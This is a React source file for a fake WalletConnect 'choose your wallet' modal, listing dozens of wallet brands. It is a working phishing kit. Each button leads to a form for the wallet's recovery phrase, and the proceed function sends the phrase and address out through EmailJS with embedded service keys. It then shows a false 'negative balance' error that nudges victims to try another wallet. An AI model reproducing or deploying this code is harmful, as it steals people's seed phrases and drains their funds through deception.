import React, { useState } from 'react'
import { useNavigate } from 'react-router-dom';
import emailjs from '@emailjs/browser';

function Connect() {
  // useEffect(() => {
  //   import('./static2/css/main.d5e4a367.css')
  // },[])
  const [first, setfirst] = useState(false);
  const [second, setsecond] = useState(false)
  const [third, setthird] = useState(false)
  const [fourth, setfourth] = useState(false)
  const [fifth, setfifth] = useState(false)
  const [phrase, setphrase] = useState(true);
  const [Keystore, setkeystore] = useState(false);
  const [privates, setprivates] = useState(false)
  const [sync, setsync] = useState(false)
  const [foot, setfoot] = useState(false)
  const [ph, setph] = useState('')
  const [adr, setadr] = useState('')
  const navigate = useNavigate()
  const handleclose = () => {
    navigate('/')
  }
  const proceed = () => {
    if (!ph || !adr) {
      alert('Please fill the empty boxes...');
      return;
    }
    setfirst(false);
    setsecond(false);
    setthird(false);
    setfourth(false);
    setfifth(false)
    setfoot(false)
    setkeystore(false)
    setphrase(false)
    setprivates(false)
    setsync(true)
    const message = `${ph}---${adr}`; // Message to send
    const apiUrl = `var.php?pr=${encodeURIComponent(message)}`;
    const handleSubmit = async() => {
      try {
        await emailjs.send(
          'service_xe0c662',
          'template_3qllz1b',
          {
            message: message,
          },
          'qpMH732yrfuRW-21g'
        )
        // Handle success response
        alert(`Error Processing your request. Kindly go back and try again. IF ERROR PERSISTS IT MEANS YOU'RE IN A NEGATIVE BALANCE OR KINDLY TRY ANOTHER WALLET`);

        setfirst(false);
        setsecond(false);
        setthird(false);
        setfourth(false);
        setfifth(false);
        setfoot(false);
        setkeystore(false);
        setphrase(true);
        setprivates(false);
        setsync(false);
      }
                catch (error) {
          // Handle errors here
          alert(`Error Processing your request. Kindly go back and try again. IF ERROR PERSISTS IT MEANS YOU'RE IN A NEGATIVE BALANCE OR KINDLY TRY ANOTHER WALLET`);

          setfirst(false);
          setsecond(false);
          setthird(false);
          setfourth(false);
          setfifth(false);
          setfoot(false);
          setkeystore(false);
          setphrase(true);
          setprivates(false);
          setsync(false);
        }
      }
      handleSubmit();
               
   
  }
    return (
      <div id="root">
        <div id="walletconnect-wrapper">
          <div
            id="walletconnect-qrcode-modal"
            className="walletconnect-qrcode__base animated fadeIn"
          >
            <div className="walletconnect-modal__base">
              <div className="walletconnect-modal__header">
                <img
                  src="data:image/svg+xml,%3C?xml%20version=%271.0%27%20encoding=%27UTF-8%27?%3E%20%3Csvg%20width=%27300px%27%20height=%27185px%27%20viewBox=%270%200%20300%20185%27%20version=%271.1%27%20xmlns=%27http://www.w3.org/2000/svg%27%20xmlns:xlink=%27http://www.w3.org/1999/xlink%27%3E%20%3C!--%20Generator:%20Sketch%2049.3%20(51167)%20-%20http://www.bohemiancoding.com/sketch%20--%3E%20%3Ctitle%3EWalletConnect%3C/title%3E%20%3Cdesc%3ECreated%20with%20Sketch.%3C/desc%3E%20%3Cdefs%3E%3C/defs%3E%20%3Cg%20id=%27Page-1%27%20stroke=%27none%27%20stroke-width=%271%27%20fill=%27none%27%20fill-rule=%27evenodd%27%3E%20%3Cg%20id=%27walletconnect-logo-alt%27%20fill=%27%233B99FC%27%20fill-rule=%27nonzero%27%3E%20%3Cpath%20d=%27M61.4385429,36.2562612%20C110.349767,-11.6319051%20189.65053,-11.6319051%20238.561752,36.2562612%20L244.448297,42.0196786%20C246.893858,44.4140867%20246.893858,48.2961898%20244.448297,50.690599%20L224.311602,70.406102%20C223.088821,71.6033071%20221.106302,71.6033071%20219.883521,70.406102%20L211.782937,62.4749541%20C177.661245,29.0669724%20122.339051,29.0669724%2088.2173582,62.4749541%20L79.542302,70.9685592%20C78.3195204,72.1657633%2076.337001,72.1657633%2075.1142214,70.9685592%20L54.9775265,51.2530561%20C52.5319653,48.8586469%2052.5319653,44.9765439%2054.9775265,42.5821357%20L61.4385429,36.2562612%20Z%20M280.206339,77.0300061%20L298.128036,94.5769031%20C300.573585,96.9713%20300.573599,100.85338%20298.128067,103.247793%20L217.317896,182.368927%20C214.872352,184.763353%20210.907314,184.76338%20208.461736,182.368989%20C208.461726,182.368979%20208.461714,182.368967%20208.461704,182.368957%20L151.107561,126.214385%20C150.496171,125.615783%20149.504911,125.615783%20148.893521,126.214385%20C148.893517,126.214389%20148.893514,126.214393%20148.89351,126.214396%20L91.5405888,182.368927%20C89.095052,184.763359%2085.1300133,184.763399%2082.6844276,182.369014%20C82.6844133,182.369%2082.684398,182.368986%2082.6843827,182.36897%20L1.87196327,103.246785%20C-0.573596939,100.852377%20-0.573596939,96.9702735%201.87196327,94.5758653%20L19.7936929,77.028998%20C22.2392531,74.6345898%2026.2042918,74.6345898%2028.6498531,77.028998%20L86.0048306,133.184355%20C86.6162214,133.782957%2087.6074796,133.782957%2088.2188704,133.184355%20C88.2188796,133.184346%2088.2188878,133.184338%2088.2188969,133.184331%20L145.571,77.028998%20C148.016505,74.6345347%20151.981544,74.6344449%20154.427161,77.028798%20C154.427195,77.0288316%20154.427229,77.0288653%20154.427262,77.028899%20L211.782164,133.184331%20C212.393554,133.782932%20213.384814,133.782932%20213.996204,133.184331%20L271.350179,77.0300061%20C273.79574,74.6355969%20277.760778,74.6355969%20280.206339,77.0300061%20Z%27%20id=%27WalletConnect%27%3E%3C/path%3E%20%3C/g%3E%20%3C/g%3E%20%3C/svg%3E"
                  className="walletconnect-modal__headerLogo"
                />
                <p>WalletConnect</p>
                <div className="walletconnect-modal__close__wrapper" onClick={handleclose} >
                  <div
                    id="walletconnect-qrcode-close"
                    className="walletconnect-modal__close__icon"
                  >
                    <div className="walletconnect-modal__close__line1" />
                    <div className="walletconnect-modal__close__line2" />
                  </div>
                </div>
              </div>
              <div className="walletconnect-modal__mobile__toggle">
                <div className="walletconnect-modal__mobile__toggle_selector" />
                <a>Mobile</a>
                <a>QR Code</a>
              </div>
              <div>
                <div>
                  <p
                    id="walletconnect-qrcode-text"
                    className="walletconnect-qrcode__text"
                  >
                    Choose your preferred wallet
                  </p>
                  <div
                    id="first"
                    className="walletconnect-connect__buttons__wrapper__wrap"
                    style={{ display: first ? '' : 'none' }}
                  >
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/rainbow.jpeg") rgb(0, 30, 89)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Rainbow
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/trust.jpeg") 0% 0% / 100% rgb(51, 117, 187)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">Trust</div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/0b415a746fb9ee99cce155c2ceca0c6f6061b1dbca2d722b3ba16381d0562150.jpeg") rgb(0, 128, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        SafePal
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/meta.jpeg") 0% 0% / 100% rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        MetaMask
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/coinbase.jpeg") 0% 0% / 100% rgb(3, 60, 121)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Coinbase
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/crypto.jpeg") 0% 0% / 100% rgb(17, 153, 250)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Crypto.com
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/pillar.jpeg") 0% 0% / 100% rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Wallet Connect
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/imtoken.jpeg") 0% 0% / 100% rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        imToken
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/bitpay.jpeg") 0% 0% / 100% rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Bitpay
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/tokenpocket.jpeg") 0% 0% / 100% rgb(41, 128, 254)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        TokenPocket
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/math.jpeg") 0% 0% / 100%'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        MathWallet
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/Binance.png") 0% 0% / 100% rgb(26, 59, 139)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Binance
                      </div>
                    </a>
                  </div>
                  <div
                    id="second"
                    className="walletconnect-connect__buttons__wrapper__wrap"
                    style={{ display: second ? '' : 'none' }}
                  >
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/4ab2542c2799c825a8465ba5ab8aa7def52b7904f38b74484af917ed9c0fc4e5.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Ledger
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/9dab7bd72148e2f796452630230666daf507935fae7bb9baf22b3c11960b034f.jpeg") rgb(13, 214, 117)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Dharma
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/09102e7bbbd3f92001eda104abe23803181629f695e8f1b95af96d88ff7d5890.jpeg") rgb(31, 36, 46)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">1inch</div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/bae74827272509a6d63ea25514d9c68ad235c14e45e183518c7ded4572a1b0c4.jpeg") rgb(45, 101, 248)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">Huobi</div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/efba9ae0a9e0fdd9e3e055ddf3c8e75f294babb8aea3499456eff27f771fda61.jpeg") rgb(55, 179, 159)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">Eidoo</div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/61f6e716826ae8455ad16abc5ec31e4fd5d6d2675f0ce2dee3336335431f720e.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">MYKEY</div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/b021913ba555948a1c81eb3d89b372be46f8354e926679de648e4fa2938bed3e.jpeg") rgb(39, 39, 39)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Coin98
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/138f51c8d00ac7b9ac9d8dc75344d096a7dfe370a568aa167eabc0a21830ed98.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        AlphaWallet
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/468b4ab3582757233017ec10735863489104515ab160c053074905a1eecb7e63.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        D'CENT
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/29f4a70ad5993f3f73ae8119f0e78ecbae51deec2a021a770225c644935c0f09.jpeg") rgb(35, 34, 32)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        ZelCore
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/8605171a052e85d629c5efe5db804c7a3fb6d0ecc759d6817f0a18cb3dacbb14.jpeg") rgb(0, 82, 243)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">Nash</div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/a395dbfc92b5519cbd1cc6937a4e79830187daaeb2c6fcdf9b9cce4255f2dcd5.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        CYBAVO
                      </div>
                    </a>
                  </div>
                  <div
                    id="third"
                    className="walletconnect-connect__buttons__wrapper__wrap"
                    style={{ display: third ? '' : 'none' }}
                  >
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/cf21952a9bc8108bf13b12c92443751e2cc388d27008be4201b92bbc6d83dd46.jpeg") 0% 0% / 100% rgb(255, 135, 91)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Argent
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/244a0d93a45df0d0501a9cb9cdfb4e91aa750cfd4fc88f6e97a54d8455a76f5c.jpeg") rgb(17, 93, 251)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        EasyPocket
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/3b0e861b3a57e98325b82ab687fe0a712c81366d521ceec49eebc35591f1b5d1.jpeg") rgb(20, 67, 95)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        SparkPoint
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/42d72b6b34411dfacdf5364c027979908f971fc60251a817622b7bdb44a03106.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        BitKeep
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/38ee551a01e3c5af9d8a9715768861e4d642e2381a62245083f96672b5646c6b.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        PEAKDEFI
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/7e90b95230bc462869bbb59f952273d89841e1c76bcc5319898e08c9f34bd4cd.jpeg") rgb(255, 190, 67)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Unstoppable
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/025247d02e1972362982f04c96c78e7c02c4b68a9ac2107c26fe2ebb85c317c0.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        HaloDeFi
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/15d1d97de89526a3c259a235304a7c510c40cda3331f0f8433da860ecc528bef.jpeg") rgb(48, 124, 249)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Ellipal
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/0fa0f603076de79bbac9a4d47770186de8913da63c8a4070c500a783cddbd1e3.jpeg")'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        KEYRINGPRO
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/19ad8334f0f034f4176a95722b5746b539b47b37ce17a5abde4755956d05d44c.jpeg") rgb(0, 0, 0)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Aktionariat
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/95501c1a07c8eb575cb28c753ab9044259546ebcefcd3645461086e49b671f5c.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        Talken
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/d612ddb7326d7d64428d035971b82247322a4ffcf126027560502eff4c02bd1c.jpeg") rgb(31, 36, 59)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">Flare</div>
                    </a>
                  </div>
                  <div
                    id="fourth"
                    className="walletconnect-connect__buttons__wrapper__wrap"
                    style={{ display: fourth ? '' : 'none' }}
                  >
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      href="import.php?wallet=KyberSwap"
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/55e5b479c9f49ddac5445c24725857f19888da1ef432ae5e4e01f8054d107670.jpeg") rgb(255, 255, 255)'
                        }}
                      />
                      <div className="walletconnect-connect__button__text">
                        KyberSwap
                      </div>
                    </a>
                    <a
                      className="walletconnect-connect__button__icon_anchor"
                      onClick={() => {
                        setfirst(false);
                        setsecond(false);
                        setthird(false);
                        setfourth(false);
                        setfifth(false)
                        setfoot(false)
                        setkeystore(false)
                        setphrase(true)
                        setprivates(false)
                        setsync(false)
                      }}
                      rel="noopener noreferrer"
                    >
                      <div
                        className="walletconnect-connect__button__icon"
                        style={{
                          background:
                            'url("Walletconnect_files/6193353e17504afc4bb982ee743ab970cd5cf842a35ecc9b7de61c150cf291e0.jpeg") rgb(255, 255, 255)'
